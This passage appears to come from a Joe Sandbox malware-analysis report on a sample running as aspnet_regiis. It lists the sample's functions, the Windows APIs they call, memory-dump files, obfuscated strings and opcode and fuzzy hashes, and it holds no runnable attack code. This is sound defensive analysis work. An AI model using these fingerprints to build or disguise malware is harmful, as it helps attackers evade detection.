                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74f65b53fdf065f2fed50168027f60320ad43909a8cb410cde32cd6dc8c7e154
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521A470504B918BD7268F3AC460722BBE2BF6B204F2896DDD4D38B78AC674E446C765
                                                                                                                                                                                                                                                                  Function 72C5DC76 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 72C5DD03
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ComputerName
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3545744682-0
                                                                                                                                                                                                                                                                  • Opcode ID: 267dbe4d930c4baae4fe0b422b23308a87f7c78dcc7ea9d0448a2543512ebd61
                                                                                                                                                                                                                                                                  • Instruction ID: 6c9434aee642e38f6deaeadeb96835e560e178a7f26595bd3e2a66f6de4c07d7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 267dbe4d930c4baae4fe0b422b23308a87f7c78dcc7ea9d0448a2543512ebd61
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D011E7B06447918BD716CF29C460722BBE2FF5A204B2CC69DD493CB386CA74E485CB61
                                                                                                                                                                                                                                                                  Function 72C6E0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000), ref: 72C6E0E0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8db41583be522588e3410d11b90e75a982dfe1f3cf7df30f0c26cfc5f91dc64e
                                                                                                                                                                                                                                                                  • Instruction ID: 37b6856e32771782f99c92cc2df02375eac3b2b9aa8a257dd054b0d4b0436943
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8db41583be522588e3410d11b90e75a982dfe1f3cf7df30f0c26cfc5f91dc64e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61F0A732454191EBC3115E3D6D08B573AA4AFE2710F160969E80057114DA35D915D591
                                                                                                                                                                                                                                                                  Function 72C6E3A9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 72C6E3BA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                  • Opcode ID: e1b0e91d63c3de2ba1440b1f067b7394ba96abb6530e3793890084b0e6fcb2a2
                                                                                                                                                                                                                                                                  • Instruction ID: d61e0656fb12ad4ce5086a14caf51980bb25a72f3c29672b30cb98c2bbc6a1d5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1b0e91d63c3de2ba1440b1f067b7394ba96abb6530e3793890084b0e6fcb2a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F08CBBE905928FDB04CF66CC5066433A3B7E831232D8A6CD502A3304DA30A906CA51
                                                                                                                                                                                                                                                                  Function 72C60B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BlanketProxy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                  • Opcode ID: b57cf10ee7397a9134ec54706d7336be76dba2a719f023385c887f8ae568c968
                                                                                                                                                                                                                                                                  • Instruction ID: e9c8ff129496eba735be489c83e0ad497f83a5412c4fe26c99c463dccd045145
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b57cf10ee7397a9134ec54706d7336be76dba2a719f023385c887f8ae568c968
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F0DAB4109701CFE344DF29C1A471ABBF0FB88704F10894CE4968B390CB75AA48CF82
                                                                                                                                                                                                                                                                  Function 72C628EB Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BlanketProxy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                  • Opcode ID: e0dd225c7d37a31ff5132d9dc822ba3066d9b60e1bd813476961b2afc5c494f9
                                                                                                                                                                                                                                                                  • Instruction ID: 95bf6207d5accce3160b057a5a96ddd739e62a91ad91ed8082f786b9a7fed017
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0dd225c7d37a31ff5132d9dc822ba3066d9b60e1bd813476961b2afc5c494f9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FF07A755483418FD314DF25C5A871BBBE0BB84308F10891DE5998B390C7B59549CF82
                                                                                                                                                                                                                                                                  Function 72C6C570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,72C6E0F9), ref: 72C6C590
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                  • Opcode ID: 801ee5d519d1cbf0b5384b203fb49da336cb1b4167aaf7d8269b9d108e867888
                                                                                                                                                                                                                                                                  • Instruction ID: 83f617c5efcebea5c87e7909dc380df3fc4ea6dacf66c2f76ec718c7243f6c37
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 801ee5d519d1cbf0b5384b203fb49da336cb1b4167aaf7d8269b9d108e867888
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43D0C932455162EBCA506F29BC0ABD73A689F69320F174995A4046A164C624EC91CAD1
                                                                                                                                                                                                                                                                  Function 72C6C55B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000), ref: 72C6C561
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: b9e8b192eeb6ca3427e1e4e1d4a16f0b273ecdfd07725810f117e8eabe995f6c
                                                                                                                                                                                                                                                                  • Instruction ID: ad911b22f6de111f5ca247c845e77b650ca712c641e9a8ed395a5b10a2d268a7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9e8b192eeb6ca3427e1e4e1d4a16f0b273ecdfd07725810f117e8eabe995f6c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFA011320800A0ABCA222A22BC0CFC23E20EB28220F228288F000080B282208C82CA80

                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                  Function 72C4EB80 Relevance: 12.1, Strings: 9, Instructions: 812COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: AL$CPm5$O}nl$Yxqs$f>mI$hch&$t|f$uvqs$
                                                                                                                                                                                                                                                                  • API String ID: 0-1556426300
                                                                                                                                                                                                                                                                  • Opcode ID: 6e69f8cf22d046992650a5345d7e24e11d827a7dc8904fffb180b4274ba297ad
                                                                                                                                                                                                                                                                  • Instruction ID: a5582349e438f991388664c6612273bc64a6a99a3401fb2bb25bf70e8b0276af
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e69f8cf22d046992650a5345d7e24e11d827a7dc8904fffb180b4274ba297ad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C152047150C3918FC712CF28C85065FBFE1AFE5218F154A6DE8EA9B282DB35D506CB92
                                                                                                                                                                                                                                                                  Function 72C48B1B Relevance: 9.7, Strings: 7, Instructions: 994COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: /$BVLm$_^]\$_^]\$_^]\$_^]\$_^]\
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-2892575238
                                                                                                                                                                                                                                                                  • Opcode ID: b4c2592c6aab79dfcbc74d60cee94e12e33947d2aefe951ccbce011e8ec44b0e
                                                                                                                                                                                                                                                                  • Instruction ID: 91c89a6c0cd314c74c9167bda2eb8626e6573266ae9ca2268d3584b701e5ed75
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4c2592c6aab79dfcbc74d60cee94e12e33947d2aefe951ccbce011e8ec44b0e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99324DB26082408FD715CE39CC91B7BBBA2FBF5314F296A6CD09787295DB318906CB51
                                                                                                                                                                                                                                                                  Function 72C3AB40 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: >$HYZF$HYZF$UMAG$Y2^0$]><
                                                                                                                                                                                                                                                                  • API String ID: 0-2666672646
                                                                                                                                                                                                                                                                  • Opcode ID: 75892f1c12c259287ff81764a0ab670d05325ecb66b023c3eeb93565dcfdec69
                                                                                                                                                                                                                                                                  • Instruction ID: f517ecc8e1823ddea5e9a80b5e346ef5619aaebd078f7309740c1449c5663ca4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75892f1c12c259287ff81764a0ab670d05325ecb66b023c3eeb93565dcfdec69
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01E1297664C7504BC316CF6DC8402AFBBE2AFD1304F48892DE5EA9B346DA75C9058787
                                                                                                                                                                                                                                                                  Function 72C583D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 72C584BD
                                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 72C585B4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                  • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                                  • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                                  • Opcode ID: 7510e550b50ef0c654be1391bd39522760b45234d1bb96e4e645624681e39ef9
                                                                                                                                                                                                                                                                  • Instruction ID: 0f8dc9f592c07a1ff1fb68adc5f98a0760234266dcd704685f73e105eab3c434
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7510e550b50ef0c654be1391bd39522760b45234d1bb96e4e645624681e39ef9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2112E072948381CFE310CF2AC88171BBBE1BF99310F294A6CE59A57391D731D949CB96
                                                                                                                                                                                                                                                                  Function 72C648C2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: aa08c2119de9cb2dd324d9c789ef88a4f55fd28bbf5376a9cbc92cdfc4cae1e9
                                                                                                                                                                                                                                                                  • Instruction ID: 06d2cdf8724a08c409731baa4d6cce01f3ee0dbf0eb1ce22ed41eeaac72471e0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa08c2119de9cb2dd324d9c789ef88a4f55fd28bbf5376a9cbc92cdfc4cae1e9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 865152B1E142499FCB40EFADD98569DBBF0BB58310F11852DE898E7350D734A948CF92
                                                                                                                                                                                                                                                                  Function 72C590D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 72C59170
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                  • String ID: M/($M/(
                                                                                                                                                                                                                                                                  • API String ID: 237503144-1710806632
                                                                                                                                                                                                                                                                  • Opcode ID: 5b23df54fede8f0f0d36b046a23281ffea7fe913e2b9538b434d1b25bbbac605
                                                                                                                                                                                                                                                                  • Instruction ID: 9ed0ef88e2417bd10c58bbf2e21eb9b31b59f2e7fc7b7a514474bf888655b0d6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b23df54fede8f0f0d36b046a23281ffea7fe913e2b9538b434d1b25bbbac605
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 582123716583615FE714CE38D882B9FB7AAEBD2700F11892CE0D1DB2C5D675880B8796
                                                                                                                                                                                                                                                                  Function 72C6CA40 Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                                  • Opcode ID: 31aeb2f51530570f3897efdc94591b91744f5628f6bf07a889d747a278c5eaee
                                                                                                                                                                                                                                                                  • Instruction ID: 682cecc11d76cb1c1d981094d0d399a8c0e7234b058542fe888d002a5102cc2b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31aeb2f51530570f3897efdc94591b91744f5628f6bf07a889d747a278c5eaee
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60714572B047415FD708DE2DC8D4B3FBBA2EBE9624F298A2DD4979B395D6309901C780
                                                                                                                                                                                                                                                                  Function 72C5C0E6 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
